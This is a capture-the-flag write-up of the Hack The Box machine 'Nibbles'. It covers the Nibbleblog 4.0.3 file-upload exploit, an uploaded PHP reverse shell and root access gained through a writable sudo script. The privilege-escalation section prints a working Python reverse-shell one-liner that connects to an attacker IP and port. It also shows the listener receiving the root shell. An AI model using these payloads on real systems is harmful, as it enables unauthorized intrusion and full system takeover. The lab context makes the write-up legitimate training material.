Nibbles

After Bashed is Traceback but I’ve done that before; next is Nibbles.

Ports

SSH and HTTP only.

HTTP

The frontpage just says Hello world! but in the page source there is a comment about /nibbleblog, so we go there. It’s running a CMS called nibbleblog; searchsploit says there are two exploits; SQLi in version 3 and an arbitrary file upload in version 4.0.3. It’s not immediately clear which we have.

Some enumeration reveals http://10.10.10.75/nibbleblog/README:

====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

So we’re after the arbitrary file upload; but it needs authentication. I try bruteforcing the login, but it has a protection mechanism whereby you are locked out after only a few attempts. I google for how to defeat it, but all of the results are Nibbles writeups!

This blog talks about how to get around the bruteforce prevention without spoiling the rest of the box, but it also gives up the password. I feel a bit conflicted about this, but I use it and log in.

I also fork the repo with the script (Python) for future reference.

Yeeting Metasploit?

The exploit from Searchsploit is a Metasploit module. Nah, let’s see if we can do it manually. It looks fairly straightfoward. We use the GUI to upload a file (the Pentestmonkey PHP reverse shell) at http://10.10.10.75/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

This prints a bunch of warnings: e.g.

Warning: imagesx() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 26

But even so it does work. We visit the shell (it gets renamed to image.php) at http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php and we get our shell

Privesc

We are nibbler. My shell is a bit dodgy and sudo -l won’t work. However it works via linpeas for some reason, and we can run /home/nibbler/personal/stuff/monitor.sh as root. Okey dokey. This file doesn’t actually exist, but there is a zipfile called personal which we can unzip and it creates the path and file. We own monitor.sh so we can make it whatever we want. I try a few payloads before I get one that works:

nibbler@Nibbles:/home/nibbler/personal/stuff$ rm monitor.sh
rm monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh
<er/personal/stuff$ printf '#!/usr/bin/python3\n' >> monitor.sh              
nibbler@Nibbles:/home/nibbler/personal/stuff$ printf 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.9",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
< os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);\n' >> monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ chmod +x monitor.sh
chmod +x monitor.sh
nibbler@Nibbles:/home/nibbler/personal/stuff$ !33
!33
sudo -u root /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out

In my listener:

┌──(root💀kali)-[/opt/htb/nibbles]
└─# nc -nvlp 1235                                                                                                                                                                                1 ⨯
listening on [any] 1235 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.75] 38506
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls -lash
total 32K
4.0K drwx------  4 root root 4.0K Dec 15 05:09 .
4.0K drwxr-xr-x 23 root root 4.0K Dec 15 05:13 ..
   0 -rw-------  1 root root    0 Dec 29  2017 .bash_history
4.0K -rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
4.0K drwx------  2 root root 4.0K Dec 10  2017 .cache
4.0K drwxr-xr-x  2 root root 4.0K Dec 10  2017 .nano
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root 1.1K Dec 15 05:09 .viminfo
4.0K -r--------  1 root root   33 Mar  7 03:44 root.txt

So that was that but I can’t help feel I missed the most important part of this challenge. Anyway; next cab off the rank is Optimum. I’ll have a crack at that tomorrow.